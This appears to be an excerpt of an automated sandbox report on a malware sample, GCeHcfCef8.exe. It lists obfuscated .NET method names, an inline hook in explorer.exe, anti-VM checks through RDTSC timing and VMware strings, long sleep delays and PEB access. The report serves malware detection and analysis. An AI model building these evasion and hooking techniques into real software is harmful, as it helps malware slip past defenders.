Source: 0.2.GCeHcfCef8.exe.4d54c30.2.raw.unpack, W6OgDvHbMVckFRWZ4G.cs	High entropy of concatenated method names: 'Hc6SZTtkaM', 'ADFShtdmtC', 'oT6SLL6st2', 'qJfSixExCk', 'F84S24RAmH', 'Ok6SFYJmee', 'nSrSfMx8cd', 'OFFVvp00ls', 'WnKVrV90FV', 'J9nVn9Wsxf'
Source: 0.2.GCeHcfCef8.exe.4d54c30.2.raw.unpack, mFNQE5DNyZSd6yBQ8w.cs	High entropy of concatenated method names: 'Xpduryv00C', 'O1GuHW5yZt', 'rd9V1rN353', 'zkiVZE9HmR', 'xYmuB0vSAr', 'hZ4utIJTav', 'S4ducWOsva', 'WaAuJyggSb', 'hKDuyQJgG9', 'fSmu4edPjU'
Source: 0.2.GCeHcfCef8.exe.4d54c30.2.raw.unpack, meWMvOklrX16XSKSCA.cs	High entropy of concatenated method names: 'kZJf93j2iC', 'VA3fWU07W5', 'Or3f6XIRlG', 'SsGwoDqcpttRmUfMpU3', 'MbO9IsqFA1cFyyc99gE', 'DQnbXnqpCyBo8QeYmA2', 'iGEiDwqW1elbxverk8C'
Source: 0.2.GCeHcfCef8.exe.4d54c30.2.raw.unpack, IEcJZcWOuQfor04MP1.cs	High entropy of concatenated method names: 'hG08Rn6Am5', 'XOI8bdmLBv', 'dRJ8PLLugS', 'TEX8EWKBLg', 'wph8mdQnMe', 'DGh8oHIYPT', 'mG88gglb3u', 'xgy8AfVlBA', 'NEQ8lDA9oD', 'sZb8drBbPH'
Source: 0.2.GCeHcfCef8.exe.4d54c30.2.raw.unpack, MXMpY1ry4fWei7SirB.cs	High entropy of concatenated method names: 'IYDVioAmZ7', 'VgSV26QkgT', 'uAAVXaifxt', 'SrMVF2Gd6Q', 'uPyVfgfwbk', 'oMYV8SpHea', 'gTYVx321UA', 'vj9VUlQICY', 'DBcVTf5DDu', 'FvnV3gPCgP'
Source: 0.2.GCeHcfCef8.exe.4d54c30.2.raw.unpack, bQqwvGzK37upD0s45s.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'beISwFV460', 'nvFSpWCjEO', 'JkLSeqtgcr', 'FhxSu8Xk88', 'dQbSV99ldU', 'oDsSSdRO6x', 'aNRSNo7LsQ'
Source: 0.2.GCeHcfCef8.exe.4d54c30.2.raw.unpack, WBaWSpZZfYeiOcV9gpa.cs	High entropy of concatenated method names: 'ToString', 'EshNhXhxX5', 'nWONL6mmX5', 'C5QNqQgwO0', 'awfNiFxdF4', 'l4WN2KUDUe', 'oJdNXlAk5X', 'ik2NFkeCuX', 'Vk9n4sBn1ZDe2IixyHH', 'Wnak0GBKQ3Yi8cV1Bbr'
Source: 0.2.GCeHcfCef8.exe.c450000.7.raw.unpack, CryDA69PZS9roASDxk.cs	High entropy of concatenated method names: 'NHM8iwgadK', 'iN68X2Ooyu', 'VsQ8fqxquV', 'a6cfHr3Mk6', 'cUsfz8l3Xw', 'Ktw814cF7y', 'q488ZpAI5R', 'wxv8Oo9fl7', 'Dg68hHaB7P', 'mEc8LrEWvN'
Source: 0.2.GCeHcfCef8.exe.c450000.7.raw.unpack, mYNhTexpbTsIsSe0PY.cs	High entropy of concatenated method names: 'uRAhqfK3ay', 'xOfhifsKaa', 'rORh2LBbA7', 'zqbhXoqC6g', 'OE9hFvSslg', 'rb5hfisouD', 'dqth8kZdks', 'ULKhxNAL73', 'hS7hUA8sE7', 'fFUhTbxD5i'
Source: 0.2.GCeHcfCef8.exe.c450000.7.raw.unpack, EIFMoAl4oDSnMK7fyt.cs	High entropy of concatenated method names: 'OuVXEQhCAo', 'SdjXoWyq5p', 'IaFXAWxQF1', 'Hg1XlHRD3x', 'rcdXpy7ByR', 'djIXeHpGA6', 'mFXXuojdBh', 'wIIXVHe6bT', 'ILPXSicrIB', 'bw6XNY7Vw0'
Source: 0.2.GCeHcfCef8.exe.c450000.7.raw.unpack, g7LrKAAAjpDeQiBfvZ.cs	High entropy of concatenated method names: 'H6u2Ji7iUm', 'mS22y603NE', 'nIi2406uRo', 'ku82j2MIeJ', 'pXI2s5QpBn', 'XCo2DqqfQT', 'Lke2v5VGkg', 'FYN2rBHBUn', 'Xum2nEu63y', 'a7n2HX4hB8'
Source: 0.2.GCeHcfCef8.exe.c450000.7.raw.unpack, X012gv2u2cUD49Zhbt.cs	High entropy of concatenated method names: 'Dispose', 'b2RZneInxP', 'XKgOM393dy', 'hN3CCjBg6H', 'zIXZHMpY1y', 'TfWZzei7Si', 'ProcessDialogKey', 'XByO1Oa20s', 'MMcOZX1rAF', 'a2JOOv6OgD'
Source: 0.2.GCeHcfCef8.exe.c450000.7.raw.unpack, SOa20snIMcX1rAF12J.cs	High entropy of concatenated method names: 'Q1EV0Hyqwr', 'wuYVMYMlkI', 'epSV52CCmS', 'YiaVYlC5pp', 'FWUVJN3UQq', 'F0QVkH1QMu', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.GCeHcfCef8.exe.c450000.7.raw.unpack, o3CIWiJtO7McCaovZf.cs	High entropy of concatenated method names: 'isRpKPVM9s', 'DM4pt1lhi2', 'TrOpJ4ORW5', 'IHPpy467ZJ', 'wxxpMbJmKw', 'dhLp5vSDwg', 'm7SpYk0XAX', 'sHGpkB7AUn', 'yU3p6W2655', 'nYVp9a8akb'
Source: 0.2.GCeHcfCef8.exe.c450000.7.raw.unpack, xDRJ5TZ1v3AtSbQZx4g.cs	High entropy of concatenated method names: 'abNSRYWEsj', 'ugVSbJhkte', 'ei6SPvYTSn', 'q1FSEiTxQ2', 'YFASm0CEk6', 'SrhSov3Kr1', 'JqWSghWEZE', 'jqBSAZxevP', 'JfPSl3KmZA', 'pLtSdOUl8T'
Source: 0.2.GCeHcfCef8.exe.c450000.7.raw.unpack, m2i897LlKZlipw7E2m.cs	High entropy of concatenated method names: 'lG2Z87LrKA', 'DjpZxDeQiB', 'E4oZTDSnMK', 'wfyZ3tbLIl', 'sLdZpyOj83', 'F8HZeWiWGA', 'XpCC6d4dDpqpiVIFm6', 'zRshXF0snAgGCmhLya', 'saAZZ6LDHB', 'AjDZhdHJU1'
Source: 0.2.GCeHcfCef8.exe.c450000.7.raw.unpack, yOsJQocmXUmHPXUuc0.cs	High entropy of concatenated method names: 'GDowA1wjeo', 'JBPwlDpE9o', 'mWew0GNXuR', 'J26wMDqlJa', 'snLwYoOqrc', 'k96wk5AMNv', 'i4Iw9iWTQ3', 'LdcwIQhTqb', 'n9pwKqnmSb', 'XEfwBl8E9v'
Source: 0.2.GCeHcfCef8.exe.c450000.7.raw.unpack, IGU6EgOvFdlUefuYca.cs	High entropy of concatenated method names: 'f1OPEsWJT', 'KiHESh9m7', 'TZXoVbnr2', 'CFNgwd2qc', 'eStlm1qOJ', 'APQd90BEj', 'JnQ9wufQtJyZwII272', 'wG6rTwDugooMg0ui7s', 'YWbV0uLHM', 'ORVNLaPlf'
Source: 0.2.GCeHcfCef8.exe.c450000.7.raw.unpack, veinETXm5LENmkkHuT.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'TUaOnfuMfF', 'p8FOH5w8AT', 'hBwOz6WbIT', 'SVah1NX5Co', 'g87hZV46OJ', 'J0GhOF0HBU', 'IPihhY1Hcj', 'aIkIMG7b3LH22dqiNOt'
Source: 0.2.GCeHcfCef8.exe.c450000.7.raw.unpack, T83d8H0WiWGA1rlfc0.cs	High entropy of concatenated method names: 'pybfqBGSEf', 'W09f2qU0xc', 'jWqfFm3r7i', 'ww3f8o5QU3', 'UeYfxWhw42', 't8JFsesAYh', 'qKlFDJKoZ2', 'Qf9FvYO7gY', 'LAbFrWR6r2', 'TpOFnxKIPe'
Source: 0.2.GCeHcfCef8.exe.c450000.7.raw.unpack, yLIl4FdYPqOOHNLdyO.cs	High entropy of concatenated method names: 'S8kFmBqM2K', 'LuOFgxQH69', 'w1OX5CfGRZ', 'SqvXYwJwNU', 'aqZXkQlDxw', 'XFbX6lwAG5', 'z07X9mrG4E', 'sTdXISQKRr', 'eDEXWx6ACi', 'smQXK53JHw'
Source: 0.2.GCeHcfCef8.exe.c450000.7.raw.unpack, W6OgDvHbMVckFRWZ4G.cs	High entropy of concatenated method names: 'Hc6SZTtkaM', 'ADFShtdmtC', 'oT6SLL6st2', 'qJfSixExCk', 'F84S24RAmH', 'Ok6SFYJmee', 'nSrSfMx8cd', 'OFFVvp00ls', 'WnKVrV90FV', 'J9nVn9Wsxf'
Source: 0.2.GCeHcfCef8.exe.c450000.7.raw.unpack, mFNQE5DNyZSd6yBQ8w.cs	High entropy of concatenated method names: 'Xpduryv00C', 'O1GuHW5yZt', 'rd9V1rN353', 'zkiVZE9HmR', 'xYmuB0vSAr', 'hZ4utIJTav', 'S4ducWOsva', 'WaAuJyggSb', 'hKDuyQJgG9', 'fSmu4edPjU'
Source: 0.2.GCeHcfCef8.exe.c450000.7.raw.unpack, meWMvOklrX16XSKSCA.cs	High entropy of concatenated method names: 'kZJf93j2iC', 'VA3fWU07W5', 'Or3f6XIRlG', 'SsGwoDqcpttRmUfMpU3', 'MbO9IsqFA1cFyyc99gE', 'DQnbXnqpCyBo8QeYmA2', 'iGEiDwqW1elbxverk8C'
Source: 0.2.GCeHcfCef8.exe.c450000.7.raw.unpack, IEcJZcWOuQfor04MP1.cs	High entropy of concatenated method names: 'hG08Rn6Am5', 'XOI8bdmLBv', 'dRJ8PLLugS', 'TEX8EWKBLg', 'wph8mdQnMe', 'DGh8oHIYPT', 'mG88gglb3u', 'xgy8AfVlBA', 'NEQ8lDA9oD', 'sZb8drBbPH'
Source: 0.2.GCeHcfCef8.exe.c450000.7.raw.unpack, MXMpY1ry4fWei7SirB.cs	High entropy of concatenated method names: 'IYDVioAmZ7', 'VgSV26QkgT', 'uAAVXaifxt', 'SrMVF2Gd6Q', 'uPyVfgfwbk', 'oMYV8SpHea', 'gTYVx321UA', 'vj9VUlQICY', 'DBcVTf5DDu', 'FvnV3gPCgP'
Source: 0.2.GCeHcfCef8.exe.c450000.7.raw.unpack, bQqwvGzK37upD0s45s.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'beISwFV460', 'nvFSpWCjEO', 'JkLSeqtgcr', 'FhxSu8Xk88', 'dQbSV99ldU', 'oDsSSdRO6x', 'aNRSNo7LsQ'
Source: 0.2.GCeHcfCef8.exe.c450000.7.raw.unpack, WBaWSpZZfYeiOcV9gpa.cs	High entropy of concatenated method names: 'ToString', 'EshNhXhxX5', 'nWONL6mmX5', 'C5QNqQgwO0', 'awfNiFxdF4', 'l4WN2KUDUe', 'oJdNXlAk5X', 'ik2NFkeCuX', 'Vk9n4sBn1ZDe2IixyHH', 'Wnak0GBKQ3Yi8cV1Bbr'
Source: 0.2.GCeHcfCef8.exe.5ce0000.6.raw.unpack, Ft.cs	High entropy of concatenated method names: 'lZA', 'RgtTUJcyZL', 'dZ3', 'MZx', 'NZe', 'EZk', 'XNe8QK', 'mP', 'aY', 'ys'
Source: 0.2.GCeHcfCef8.exe.31cdf08.1.raw.unpack, Ft.cs	High entropy of concatenated method names: 'lZA', 'RgtTUJcyZL', 'dZ3', 'MZx', 'NZe', 'EZk', 'XNe8QK', 'mP', 'aY', 'ys'

Hooking and other Techniques for Hiding and Protection

Modifies the prolog of user mode functions (user mode inline hooks)

Source: explorer.exe

User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8A 0xAE 0xE2

Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: GCeHcfCef8.exe PID: 6280, type: MEMORYSTR

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\GCeHcfCef8.exe	RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	RDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmmon32.exe	RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmmon32.exe	RDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Windows\explorer.exe

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

graph_3-13940

Source: C:\Users\user\Desktop\GCeHcfCef8.exe TID: 372	Thread sleep time: -35529s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\GCeHcfCef8.exe TID: 2736	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7000	Thread sleep count: 6341 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7000	Thread sleep time: -12682000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7000	Thread sleep count: 3588 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7000	Thread sleep time: -7176000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe TID: 2360	Thread sleep count: 957 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe TID: 2360	Thread sleep time: -1914000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe TID: 2360	Thread sleep count: 9014 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe TID: 2360	Thread sleep time: -18028000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\cmmon32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\cmmon32.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\GCeHcfCef8.exe

Code function: 2_2_00409AB0 rdtsc

2_2_00409AB0

Source: C:\Users\user\Desktop\GCeHcfCef8.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 6341	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 3588	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 877	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 869	Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe	Window / User API: threadDelayed 957	Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe	Window / User API: threadDelayed 9014	Jump to behavior

Source: C:\Users\user\Desktop\GCeHcfCef8.exe	API coverage: 1.7 %
Source: C:\Windows\SysWOW64\cmmon32.exe	API coverage: 1.9 %

Source: C:\Users\user\Desktop\GCeHcfCef8.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Thread delayed: delay time: 35529			Jump to behavior
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: explorer.exe, 00000003.00000002.3804772422.00000000087C2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083531825.00000000087C2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1327499164.00000000087C2000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW6
Source: explorer.exe, 00000003.00000003.2192098195.00000000087FE000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000003.00000002.3805799384.00000000088E5000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000r
Source: explorer.exe, 00000003.00000002.3805799384.00000000088E5000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}Z
Source: explorer.exe, 00000003.00000000.1327499164.0000000008761000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: v@oem2.inf,%loc.vmwarebusdevicedesc%;VMware VMCI Bus Device
Source: explorer.exe, 00000003.00000003.2192098195.00000000087FE000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTVMWare
Source: explorer.exe, 00000003.00000002.3805799384.00000000088E5000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}otti
Source: explorer.exe, 00000003.00000002.3804772422.00000000087C2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083531825.00000000087C2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1327499164.00000000087C2000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000003.00000002.3791650388.00000000005A0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000\
Source: explorer.exe, 00000003.00000000.1325316023.0000000004027000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}s/U6
Source: explorer.exe, 00000003.00000002.3804772422.0000000008761000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1327499164.0000000008761000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW@
Source: explorer.exe, 00000003.00000002.3791650388.00000000005A0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000003.00000002.3805799384.00000000088E5000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000

Source: C:\Users\user\Desktop\GCeHcfCef8.exe

Code function: 2_2_00409AB0 rdtsc

2_2_00409AB0

Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01778158 mov eax, dword ptr fs:[00000030h]	2_2_01778158
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01774144 mov eax, dword ptr fs:[00000030h]	2_2_01774144
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01774144 mov eax, dword ptr fs:[00000030h]	2_2_01774144
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01774144 mov ecx, dword ptr fs:[00000030h]	2_2_01774144
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01774144 mov eax, dword ptr fs:[00000030h]	2_2_01774144
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01774144 mov eax, dword ptr fs:[00000030h]	2_2_01774144
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016E6154 mov eax, dword ptr fs:[00000030h]	2_2_016E6154
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016E6154 mov eax, dword ptr fs:[00000030h]	2_2_016E6154
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016DC156 mov eax, dword ptr fs:[00000030h]	2_2_016DC156
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01710124 mov eax, dword ptr fs:[00000030h]	2_2_01710124
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0178A118 mov ecx, dword ptr fs:[00000030h]	2_2_0178A118
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0178A118 mov eax, dword ptr fs:[00000030h]	2_2_0178A118
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0178A118 mov eax, dword ptr fs:[00000030h]	2_2_0178A118
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0178A118 mov eax, dword ptr fs:[00000030h]	2_2_0178A118
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_017A0115 mov eax, dword ptr fs:[00000030h]	2_2_017A0115
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0178E10E mov eax, dword ptr fs:[00000030h]	2_2_0178E10E
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0178E10E mov ecx, dword ptr fs:[00000030h]	2_2_0178E10E
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0178E10E mov eax, dword ptr fs:[00000030h]	2_2_0178E10E
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0178E10E mov eax, dword ptr fs:[00000030h]	2_2_0178E10E
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0178E10E mov ecx, dword ptr fs:[00000030h]	2_2_0178E10E
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0178E10E mov eax, dword ptr fs:[00000030h]	2_2_0178E10E
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0178E10E mov eax, dword ptr fs:[00000030h]	2_2_0178E10E
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0178E10E mov ecx, dword ptr fs:[00000030h]	2_2_0178E10E
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0178E10E mov eax, dword ptr fs:[00000030h]	2_2_0178E10E
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0178E10E mov ecx, dword ptr fs:[00000030h]	2_2_0178E10E
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_017101F8 mov eax, dword ptr fs:[00000030h]	2_2_017101F8
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_017B61E5 mov eax, dword ptr fs:[00000030h]	2_2_017B61E5
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0175E1D0 mov eax, dword ptr fs:[00000030h]	2_2_0175E1D0
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0175E1D0 mov eax, dword ptr fs:[00000030h]	2_2_0175E1D0
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0175E1D0 mov ecx, dword ptr fs:[00000030h]	2_2_0175E1D0
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0175E1D0 mov eax, dword ptr fs:[00000030h]	2_2_0175E1D0
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0175E1D0 mov eax, dword ptr fs:[00000030h]	2_2_0175E1D0
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_017A61C3 mov eax, dword ptr fs:[00000030h]	2_2_017A61C3
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_017A61C3 mov eax, dword ptr fs:[00000030h]	2_2_017A61C3
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0176019F mov eax, dword ptr fs:[00000030h]	2_2_0176019F
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0176019F mov eax, dword ptr fs:[00000030h]	2_2_0176019F
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0176019F mov eax, dword ptr fs:[00000030h]	2_2_0176019F
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0176019F mov eax, dword ptr fs:[00000030h]	2_2_0176019F
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0179C188 mov eax, dword ptr fs:[00000030h]	2_2_0179C188
